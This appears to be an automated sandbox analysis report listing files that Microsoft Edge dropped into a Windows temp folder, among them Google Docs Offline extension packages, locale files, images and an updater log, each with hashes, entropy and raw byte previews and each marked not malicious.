                                                                                                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\0011bbb0-1994-48a9-9db2-09056c86101c.tmp

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):135771
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.802585890890899
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3072:LtlntxI0jRnnf4pTz8IayMaCRABlauflM+u0F/oWRW:pl4+hf4pTky1EABYufNFS4W
                                                                                                                                                                                                                                                                                                                                MD5:DA75BB05D10ACC967EECAAC040D3D733
                                                                                                                                                                                                                                                                                                                                SHA1:95C08E067DF713AF8992DB113F7E9AEC84F17181
                                                                                                                                                                                                                                                                                                                                SHA-256:33AE9B8F06DC777BB1A65A6BA6C3F2A01B25CD1AFC291426B46D1DF27EA6E7E2
                                                                                                                                                                                                                                                                                                                                SHA-512:56533DE53872F023809A20D1EA8532CDC2260D40B05C5A7012C8E61576FF092F006A197F759C92C6B8C429EEEC4BB542073B491DDCFD5B22CD4ECBE1A8A7C6EF
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[...........=.B.../EYp....i:........ua....w...\H.j....b....4...l.b.:u.%1z....}L.A.F.IZ.2^.j...!F.&@;L..z...02..`:J_@....m....qcQ.|sD.r`vC.#.8lm...R.8.~A...."~)".[.M...o.a.H.$..(.d/.K.6......c........#.$..>.#..3..-...n4J.$-....N...s.G...3..q.e..(.B?*."...9M......[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...H0F.!..w./B..$<......r-.'..xp.H..Q...8.!..R^...%..W0....q....g.D..~.".%............mo.:......<#a..e...Chp...x4z....!.!.a...qgo....p8.T.6...Z....?..CV...<..K...?....k..........q=....Y^........!..K...G...m.n..Y.Y.......u.Wf...TO".?.......U/Rd..Y....j....H..Q...{.....x.OQ.~+}...L.9_.:.,E.....q.0&...I;b..H...>...9.}.B

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\0cdbc265-84ef-48f9-ba59-03eaeb49a8c7.tmp

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:.

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\19b9b5c3-fd45-4067-81f3-8e67fd75d1a9.tmp

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):11185
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                                                MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                                                SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                                                SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                                                SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\4db07784-ae47-490f-92be-8914131317ce.tmp

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 41900
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):76321
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.996057445951542
                                                                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                                                                SSDEEP:1536:hS5Vvm808scZeEzFrSpzBUl4MZIGM/iys3BBrYunau6wpGzxue:GdS8scZNzFrMa4M+lK5/nXexue
                                                                                                                                                                                                                                                                                                                                MD5:D7A1AC56ED4F4D17DD0524C88892C56D
                                                                                                                                                                                                                                                                                                                                SHA1:4153CA1A9A4FD0F781ECD5BA9D2A1E68C760ECD4
                                                                                                                                                                                                                                                                                                                                SHA-256:0A29576C4002D863B0C5AE7A0B36C0BBEB0FB9AFD16B008451D4142C07E1FF2B
                                                                                                                                                                                                                                                                                                                                SHA-512:31503F2F6831070E887EA104296E17EE755BB6BBFB1EF2A15371534BFA2D3F0CD53862389625CF498754B071885A53E1A7F82A3546275DB1F4588E0E80BF7BEE
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:...........m{..(.}...7.\...N.D*.w..m..q....%XfL.*I.ql..;/.....s...E...0....`..A..[o^.^Y...F_.'.*.."L...^.......Y..W..l...E0..YY...:.&.u?....J..U<.q."...p.ib:.g.*.^.q.mr.....^&.{.E.....,EAp.q.......=.=.....z^.,d.^..J.R..zI4..2b?.-D5/.^...+.G..Y..?5..k........i.,.T#........_DV....P..d2......b\..L....o....Z.}../....CU.$.-..D9`..~......=....._.2O..?....b.{...7IY.L..q....K....T..5m.d.s.4.^... ..~<..7~6OS..b...^>.......s..n....k."..G.....L...z.U...... ... .ZY...,...kU1..N...(..V.r\$..s...X.It...x.mr..W....g........9DQR....*d......;L.S.....G... .._D.{.=.zI.g.Y~...`T..p.yO..4......8$..v.J..I.%..._.d.[..du5._._...?\..8.c.....U...fy.t....q.t....T@.......:zu..\,.!.I..AN_.....FeX..h.c.i.W.......(.....Y..F...R%.\..@.. 2(e,&.76..F+...l.t.$..`...........Wi.{.U.&(.b}...}.i..,...k....!..%...&.c..D-."..SQ.......q9....)j....7.".N....AX...).d./giR....uk.....s.....^...........:...~......(hP..K.@.&..?.E0:+D|9...U.q.cu..)t{.e...X...{.....z......LL&I6.=.

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\572f3511-ce38-4d56-8946-8e0fcb526e84.tmp

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CC 2017 (Macintosh), datetime=2019:01:23 13:24:18], baseline, precision 8, 401x402, components 3
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1818691
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.993710836275925
                                                                                                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                                                                                                SSDEEP:49152:JPoN7xbMhc6XN+RsQEiNq8zpOkM67e3QB7HQ+B0Hu:JQNeWMNSsCwRwegBc+iHu
                                                                                                                                                                                                                                                                                                                                MD5:DAD493E0A67F1F89C763B533FB1CB3F9
                                                                                                                                                                                                                                                                                                                                SHA1:2EA0088668E2E38BF804B5FDE5B0923690B86124
                                                                                                                                                                                                                                                                                                                                SHA-256:446453D66BACAA70DEE6E51E120B99D4478FB11097D8F50D2D7AF5150519E32A
                                                                                                                                                                                                                                                                                                                                SHA-512:524BDD61E323A2F7099F018A095E6073C103E422BFC01819A28E0428218B638987AB0D54642484AA1E148DCB3618C8D9F155435491A6BAE4B78809C327E9320E
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:......JFIF.....,.,......Exif..MM.*.............................b...........j.(...........1.....$...r.2...........i...............-....'..-....'.Adobe Photoshop CC 2017 (Macintosh).2019:01:23 13:24:18.....................................................................$...........,.(.....................4...................H.......H.........C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......w.w..!............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..4..}Z...5uB. c v..?..........My4.....f..O.I.?....

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\8978f35f-bf16-4c83-ac4d-8890b93ab17d.tmp

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):206855
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.983996634657522
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3072:5WcDW3D2an0GMJGqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEI5:l81Lel7E6lEMVo/S01fDpWmEgD
                                                                                                                                                                                                                                                                                                                                MD5:788DF0376CE061534448AA17288FEA95
                                                                                                                                                                                                                                                                                                                                SHA1:C3B9285574587B3D1950EE4A8D64145E93842AEB
                                                                                                                                                                                                                                                                                                                                SHA-256:B7FB1D3C27E04785757E013EC1AC4B1551D862ACD86F6888217AB82E642882A5
                                                                                                                                                                                                                                                                                                                                SHA-512:3AA9C1AA00060753422650BBFE58EEEA308DA018605A6C5287788C3E2909BE876367F83B541E1D05FE33F284741250706339010571D2E2D153A5C5A107D35001
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\c0a68fdf-86be-41b0-921c-889642ffed99.tmp

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:.

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\cv_debug.log

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):2110
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.402931251902056
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:Yzj57SnaJ57H57Uv5W1Sj5W175zuR5z+5zn071eDJk5c1903bj5jJp0gcU854Rry:8e2Fa116uCntc5toYegM
                                                                                                                                                                                                                                                                                                                                MD5:80C7239E764BE2476F3E4B0A452546A6
                                                                                                                                                                                                                                                                                                                                SHA1:C6EF6E304D7B2482F54546B0307847C9B5B84ECD
                                                                                                                                                                                                                                                                                                                                SHA-256:43049DCA1F363F66B20E3125E4BBD6180BBD39CCF77F16A9FA698CEE65B1ACF6
                                                                                                                                                                                                                                                                                                                                SHA-512:4F350956C73C9B390264693801A7A7C49149749B2CCC4B24C3D0854BB9B95B7EF7C890A36E367C0E3D6B6FAC7366120D96948A72DB8564EE1DE9DEB5F5DCD0BE
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{"logTime": "1004/133448", "correlationVector":"vYS73lRT+EoO2Owh9jsc+Y","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"n/KhuHPhHmYXokB31+JZz7","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"fclQx26bUZO07waFEDe6Fn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133448", "correlationVector":"0757l0tkKt37vNrdCKAm8w","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"uTRRkmbbqkgK/wPBCS4fct","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/133449", "correlationVector":"2DrXipL1ngF91RN7IemK0e","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"d0GyjEgnW85fvDIojHVIXI","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"PvfzGWRutB/kmuXUK+c8XA","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1004/134324", "correlationVector":"29CB75FBC4C942E0817A1F7A0E2CF647

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\0011bbb0-1994-48a9-9db2-09056c86101c.tmp

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):135771
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.802585890890899
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:3072:LtlntxI0jRnnf4pTz8IayMaCRABlauflM+u0F/oWRW:pl4+hf4pTky1EABYufNFS4W
                                                                                                                                                                                                                                                                                                                                MD5:DA75BB05D10ACC967EECAAC040D3D733
                                                                                                                                                                                                                                                                                                                                SHA1:95C08E067DF713AF8992DB113F7E9AEC84F17181
                                                                                                                                                                                                                                                                                                                                SHA-256:33AE9B8F06DC777BB1A65A6BA6C3F2A01B25CD1AFC291426B46D1DF27EA6E7E2
                                                                                                                                                                                                                                                                                                                                SHA-512:56533DE53872F023809A20D1EA8532CDC2260D40B05C5A7012C8E61576FF092F006A197F759C92C6B8C429EEEC4BB542073B491DDCFD5B22CD4ECBE1A8A7C6EF
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[...........=.B.../EYp....i:........ua....w...\H.j....b....4...l.b.:u.%1z....}L.A.F.IZ.2^.j...!F.&@;L..z...02..`:J_@....m....qcQ.|sD.r`vC.#.8lm...R.8.~A...."~)".[.M...o.a.H.$..(.d/.K.6......c........#.$..>.#..3..-...n4J.$-....N...s.G...3..q.e..(.B?*."...9M......[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...H0F.!..w./B..$<......r-.'..xp.H..Q...8.!..R^...%..W0....q....g.D..~.".%............mo.:......<#a..e...Chp...x4z....!.!.a...qgo....p8.T.6...Z....?..CV...<..K...?....k..........q=....Y^........!..K...G...m.n..Y.Y.......u.Wf...TO".?.......U/Rd..Y....j....H..Q...{.....x.OQ.~+}...L.9_.:.,E.....q.0&...I;b..H...>...9.}.B

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\128.png

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):4982
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                                                                MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                                                                SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                                                                SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                                                                SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\af\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):908
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                                                                MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                                                                SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                                                                SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                                                                SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\am\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1285
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                                                                MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                                                                SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                                                                SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                                                                SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

                                                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8064_203325705\CRX_INSTALL\_locales\ar\messages.json

                                                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1244
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                                                                MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                                                                SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                                                                                SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                                                                                SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                                                                Malicious:false
